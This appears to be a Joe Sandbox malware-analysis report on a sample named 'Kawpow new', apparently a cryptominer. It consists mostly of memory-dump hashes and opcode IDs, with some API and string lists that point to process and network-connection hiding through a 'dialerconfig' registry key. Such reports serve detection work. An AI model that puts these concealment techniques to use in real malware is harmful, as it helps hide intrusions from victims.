                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6eebac82438cb2ac1733bb98967527104fba231c1d1b47265a39fe58bfa9c1a9
                          • Instruction ID: fd0f090951705d6fd864ba1e7846a546adb475be496a305fc573d8c036474b21
                          • Opcode Fuzzy Hash: 6eebac82438cb2ac1733bb98967527104fba231c1d1b47265a39fe58bfa9c1a9
                          • Instruction Fuzzy Hash: 85315274A002059FEB44EFA8D854ABE77F6EF84304F108479D611AB3A4DA75AD418F91
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0c94e2a978530e7eb5d608a8acd387a2db86dc5d80b1ae7b9acbcc5a9196976b
                          • Instruction ID: 8ccf791b66519234e77d293b6bed862d16a5f03d604a144a61316fb34746b7d4
                          • Opcode Fuzzy Hash: 0c94e2a978530e7eb5d608a8acd387a2db86dc5d80b1ae7b9acbcc5a9196976b
                          • Instruction Fuzzy Hash: 44214771600300DFCB55CF14D9C0B16BF65FB88314F20CAA9EF098A296C37AE416CBA1
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 75f2e7ecb95ba5f315ebd0c3ee2e5237857eda061b2cb3c15c884bdbe262215d
                          • Instruction ID: e2c6fb7f880586e6a7d2e0be83d7b43ee46b0df7e05363074185324379f5960b
                          • Opcode Fuzzy Hash: 75f2e7ecb95ba5f315ebd0c3ee2e5237857eda061b2cb3c15c884bdbe262215d
                          • Instruction Fuzzy Hash: 3331AEB49053448EDB60CF6AC18838AFFE6FF88324F28C82DC85D97205D674A490CBA1
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37d069b265b21d0696d16d3ffdf3c8004edd587caed1d17acdc2f3a86bf8b42b
                          • Instruction ID: 2c1b6c8207647d1effb2ab07e922767f0ce0ab9a162020ecbf829fd8947bd487
                          • Opcode Fuzzy Hash: 37d069b265b21d0696d16d3ffdf3c8004edd587caed1d17acdc2f3a86bf8b42b
                          • Instruction Fuzzy Hash: ED212571614204DFDB64EF24C9C0B16BF65FB84314F24CA69DB098B296C3BAE406CA61
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e521028710c2fae934411ccfb9d12d8c3396bc09942dfb0b029a374d79afc6b
                          • Instruction ID: 3de73f7fb46db0cba676524b2c8e1fb90d3eaecda66849569b7c68d05dc6ce3e
                          • Opcode Fuzzy Hash: 5e521028710c2fae934411ccfb9d12d8c3396bc09942dfb0b029a374d79afc6b
                          • Instruction Fuzzy Hash: 4D216BB49057448EDB60CF6AC48939AFFF6FF88314F28C82DD85D97245D77464908BA1
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc78d84d2bb124e60d0c38fc79b4948b0f5324aa085e058d38f1345f8c9de52b
                          • Instruction ID: 6f6fd8c55711ebf56fe0a566d59d7660146611721594264ae66804343307507c
                          • Opcode Fuzzy Hash: fc78d84d2bb124e60d0c38fc79b4948b0f5324aa085e058d38f1345f8c9de52b
                          • Instruction Fuzzy Hash: 9511FE39B001188FCB04DBA8E9409AE77FAEFCC715B0040A5E909DB365DA35ED158B91
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction ID: 9425ce51af6f3a64a2b15605058b3a17a172bace390df42345519d45250b1318
                          • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction Fuzzy Hash: 4721C076504640DFCF16CF10D9C4B15BF72FB88314F24CAA9DE494A256C33AD45ACB91
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction ID: 0c483a44ec00e467763abeb71dd80e72c8ffaaa4a33cab3fd695eb215578a5f6
                          • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction Fuzzy Hash: D111D075504280CFCB22DF14D9C4B15BF61FB44314F28CAA9DA498B696C37AE44ACF61
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a100394c0aa06be38353599b9d5c5f71f2ae02f5c5e95c2c90fe35258e7bb6f6
                          • Instruction ID: 28795cc3586000bdad6b292c1b48f92a14cb581584ea0aeef826dd726fd1bd60
                          • Opcode Fuzzy Hash: a100394c0aa06be38353599b9d5c5f71f2ae02f5c5e95c2c90fe35258e7bb6f6
                          • Instruction Fuzzy Hash: 3601F1316093409FC714DB39D898A9A7FE4EF46210F1588EEE18ACB6A2CB20FC44C781
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0324ec418666bdad5577fe38f261504f4d571c1cb1e092b0931556a6a4250407
                          • Instruction ID: dbcde655f5e8eb86debfe2985c5349945c859d8987d57fa29af1f2a347c9cb75
                          • Opcode Fuzzy Hash: 0324ec418666bdad5577fe38f261504f4d571c1cb1e092b0931556a6a4250407
                          • Instruction Fuzzy Hash: 8B0180357012149FCB119B74EC186AEBBF5FB89215B00406DE91AD3242DB366911CB91
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aeb5a2691b4a4989439197a82b40243efb006bf8579a7e29f4f7891f6b50ce51
                          • Instruction ID: 2a9b7f31fd5a84b4bc221343eb079a351f8575dde2cd9c9e36eb5cb2c9b599b0
                          • Opcode Fuzzy Hash: aeb5a2691b4a4989439197a82b40243efb006bf8579a7e29f4f7891f6b50ce51
                          • Instruction Fuzzy Hash: AB110535204754CFC728DF35D08086ABBF6EF8931532089ADD48A8BBA0CB36F846CB50
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee2902abdedf68a05525f7f91ccda20cebf0bd0bc7cb9f128bce7c31e4f7984f
                          • Instruction ID: e1325f2748434cf2c3b120d6db64ce5875295219672ca02e1fd53995c24c58d4
                          • Opcode Fuzzy Hash: ee2902abdedf68a05525f7f91ccda20cebf0bd0bc7cb9f128bce7c31e4f7984f
                          • Instruction Fuzzy Hash: DB012B715053049AE7609E55ED84B67BFDCEF45324F18CA29ED4C8B2C6C279A842CAB1
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b22a53b5ee282c28edcdeb5ad2859f3fe3c832414fbf69fdc814331b4f5f5052
                          • Instruction ID: aeba4242df2fc4e30a4160f31dc2d0445da999434dd137ab1018228a2d5b032e
                          • Opcode Fuzzy Hash: b22a53b5ee282c28edcdeb5ad2859f3fe3c832414fbf69fdc814331b4f5f5052
                          • Instruction Fuzzy Hash: 6D018C7140E3C09ED7128B259C94A52BFB4EF53224F18C5CBD8888F2E3C2695849C7B2
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8cffda52b6d641efcfe6f0278acafb88ef7f65ac504cf618f19aa8d2ef908a64
                          • Instruction ID: 3702329d26a0d6d7aeb8266f7f2114469716e015dde7106426feccd9adb3d54b
                          • Opcode Fuzzy Hash: 8cffda52b6d641efcfe6f0278acafb88ef7f65ac504cf618f19aa8d2ef908a64
                          • Instruction Fuzzy Hash: 61F0A4353093A41FD7118A799C94DB77FE9EF8622070540BAF454CB362D6A1CC0487A0
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7253bef56c31c9a627943684330ee31fae21ad7cd8d6ebe3614823e0e7ef60f7
                          • Instruction ID: 2faca453dd447a28d2830e9191b32e500c0e2d2a0f3f4670aa58c77574fca441
                          • Opcode Fuzzy Hash: 7253bef56c31c9a627943684330ee31fae21ad7cd8d6ebe3614823e0e7ef60f7
                          • Instruction Fuzzy Hash: 49F05E367092655FD7108A6A9C44DBBBFEDEBC9621B04407AF958C7352DAB1DD0086A0
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0424dfe08eb14ef2d27ec7114f0f1ae4f241d0a80343493b3a2cca813928af6
                          • Instruction ID: 7d94ef4539c3f35302fa1731ee1aa261f168a912812447768a87e0e984d846a5
                          • Opcode Fuzzy Hash: c0424dfe08eb14ef2d27ec7114f0f1ae4f241d0a80343493b3a2cca813928af6
                          • Instruction Fuzzy Hash: 9CF03776200600AF93608F0ADD84C22FBEDEFD4670719C55AE84A8B652C671FC41CEA0
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b5509b0aeb7a3556600d30b94c27586ca6113920a4d52b951a393a192a1498c
                          • Instruction ID: a58c4d87208b31215cc168a310832edfaadd207c8a3701f6a669aff49c0d336a
                          • Opcode Fuzzy Hash: 2b5509b0aeb7a3556600d30b94c27586ca6113920a4d52b951a393a192a1498c
                          • Instruction Fuzzy Hash: C0F03A353152819FC3118B1CD494C66BBB6AFCA32532901AAF086CB736CA21DC01C791
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b12acca89c81589ee6b2117704e7b12bd8c46567a3e9aff261753222db901f99
                          • Instruction ID: 940bbaf2e11a092ac58c3dcf6e1a44656c8afc5de7d60304d93c2b9c9ec5df99
                          • Opcode Fuzzy Hash: b12acca89c81589ee6b2117704e7b12bd8c46567a3e9aff261753222db901f99
                          • Instruction Fuzzy Hash: A1F0F675B142404FE711AB68C5183AB7B62DFC1319F1581AFC5059B396CE792906CBA2
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 259b0e99831a2eebbd160d23ff0eabf3147929bdf18a758151a48dc816b9fc51
                          • Instruction ID: 4d51daccc7927741827bc5fc5a158baeec64cfe28227194cf0bf4384b63059af
                          • Opcode Fuzzy Hash: 259b0e99831a2eebbd160d23ff0eabf3147929bdf18a758151a48dc816b9fc51
                          • Instruction Fuzzy Hash: 0AF0E232300618AFCB149B9AD840AAFB7E9EBC8271B00452DE10AC3210DF74BC458790
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9aba9e36e31f73d11a98e31053a2178ca866e3f75c06e32dcb9b446ea788c8f4
                          • Instruction ID: d988e240e7be1071721712e278bc8bd73a24c1d7ea61ccc75b848574bedff874
                          • Opcode Fuzzy Hash: 9aba9e36e31f73d11a98e31053a2178ca866e3f75c06e32dcb9b446ea788c8f4
                          • Instruction Fuzzy Hash: 34F04975100680AFD361CF06CD84D23BBF9EF85620B29C589E84A8B352C630FC42CFA0
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9dc4b760f9e043dc6b0cd377bad608bd4a027f34ee5cd2635d7eb11e8ef73738
                          • Instruction ID: d4b47dfe2bfc83b8cdeb3b1629ec3491332cb456f2e1a8a37f6c262675c5e2bc
                          • Opcode Fuzzy Hash: 9dc4b760f9e043dc6b0cd377bad608bd4a027f34ee5cd2635d7eb11e8ef73738
                          • Instruction Fuzzy Hash: C7F0A7313006185FDB149B5AD84496FB7EDEBC8275B00457DE10AD7250DF71BC458791
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f42e9cac4519e270926580ed51e49c5a919f18ea5cb5446a4bc1fbdb54d98068
                          • Instruction ID: 2418dd504d93ac0570e5c4ff4e7d50b6996690b73e2607f87e88b49a42bf385d
                          • Opcode Fuzzy Hash: f42e9cac4519e270926580ed51e49c5a919f18ea5cb5446a4bc1fbdb54d98068
                          • Instruction Fuzzy Hash: AEF0E5312067506BC712672D7C08CDF7FEACEC327030481AEE45ADB652DA54D806C7E2
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d558d8079ecded7b9eea86f78aa5b728a412f69b20274e772d7e65547b49640e
                          • Instruction ID: 2de40a72bfd3d1b86eb338b3688b737c1bd9000d9b6457f6f5358495c880779a
                          • Opcode Fuzzy Hash: d558d8079ecded7b9eea86f78aa5b728a412f69b20274e772d7e65547b49640e
                          • Instruction Fuzzy Hash: 67F0A0397005088FDB00DBACD940AAA77EAEFCC75570041A5E80ACB325DE34EC128BD1

                          Execution Graph

                          Execution Coverage:0.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph (3 nodes):
                          • 14722: 27e82473844 -> 14723, 14724
                          • 14723: 27e82473851 StrCmpNIW -> 14724
                          • 14724: 27e82473866

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph:
                          • 0: 27e82473844-27e8247384f -> 1, 2
                          • 1: 27e82473851-27e82473864 StrCmpNIW -> 2, 3
                          • 2: 27e82473869-27e82473870
                          • 3: 27e82473866 -> 2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID: dialer
                          • API String ID: 0-3528709123
                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                          • Instruction ID: 26eb1e06ae24d8eeb0f125595e0b40c4b0d4bdc1d5ac12d4f5ea3e40cf336c0e
                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                          • Instruction Fuzzy Hash: 37D0A760725309CAFF54DFA6C8CCA622798EB0C744F8E80A0C92805270DB688D8D9731

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction ID: a3b171aca9dadbfd4afe885cd0f4ad7b3c1a8a407c07e7c1c8ac0a6061d1ccb0
                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction Fuzzy Hash: 96615632B056918BDF54CF15C82472E73AAF758B95F198122DE2D23798CA38DC62C721

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 52 7ff762151140-7ff762151151 call 7ff762151160
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238536709.00007FF762151000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF762150000, based on PE: true
                          • Associated: 00000013.00000002.2238491241.00007FF762150000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000013.00000002.2238817218.00007FF76215C000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000013.00000002.2238926005.00007FF76215F000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000013.00000002.2238972907.00007FF762160000.00000008.00000001.01000000.0000000D.sdmp
                          • Associated: 00000013.00000002.2239873220.00007FF762654000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000013.00000002.2239936886.00007FF76268C000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ff762150000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                          • Instruction ID: f8802c7f46f3e18d493061fe55dac9e317d60afcb7c76c7d434fbcdbb3885cce
                          • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                          • Instruction Fuzzy Hash: 32B092B4908209C4EA493F29E88125962606B08740F8004A0C40C62392CAAD5040CB20

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 106492572-2879589442
                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction ID: 440ed657f082d5170195954547255639f1e4cb2d291513d66c31c52a45d77218
                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction Fuzzy Hash: CB713C26324A0489EF50EF71E88865A23A8F78DB8CF0A1151DD5E67B39DF34C844CB72

                          Control-flow Graph

                          control_flow_graph: function at 27e82472b2c (entry block 27e82472b2c-27e82472ba5); graph edge data and executed/not-executed colouring omitted. API calls named in the graph: GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction ID: 5d2ed3d7b3b34fc065d024df37ac3b9dc4ebe44713f4caf5c7a2a02d1de5e10c
                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction Fuzzy Hash: EEB19062218A588AEFA4CF25D8487AB63E9F748B84F4A5097EE5D537B4DB34CC40C371
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction ID: 2329d9bdf98cf03af7b2ed3bcd6a444f498866ae47961cea63c6dca51e09f7b7
                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction Fuzzy Hash: FB319272219B8489EF609F60E8443EE7368F788744F494469DB5D57BA4EF38C948C731
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction ID: 1c2b943c7d58d3d1971a63a76a6fc0e23cdccc6f0110782ab8828349c58c6c49
                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction Fuzzy Hash: 05319132218B808AEF60CF25E84439F73A8F78C754F590165EAAD57BA4DF38C945CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction ID: bae5a53e7f4429e83a2a0e9d4612feb994081283a5fa345ed1758d72066f806e
                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction Fuzzy Hash: EE118222714F0089EF50CF60E8593A933A8F31D758F490E25DE6D56BB4DF78C59883A1
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                          • Instruction ID: 2d405ec51cd0b1919d2cd4a17c63cf152c14040573c415f76a69764ab8b01770
                          • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                          • Instruction Fuzzy Hash: C75107227146D48DFF20DB72A84839B7BA8F748794F194254EE6C27BA9DF39C801C721
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                          • Instruction ID: 2064d21985f5000671fa93e104d2a939b7ae9f3f2e816239d1b2b198c0e707c5
                          • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                          • Instruction Fuzzy Hash: 18F068717182558EDF988F28E51671A77D5F32C380FD1809AD68D93B18D23C9450CF15

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction ID: d1deb6fcf1c79b274480ba0982d9eec607482aa91205c9a653c6a98e377da29a
                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction Fuzzy Hash: 8A515932618B848AEF51CF62E44836B77A5F389F89F094124DA5E17729DF38C849CB21

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
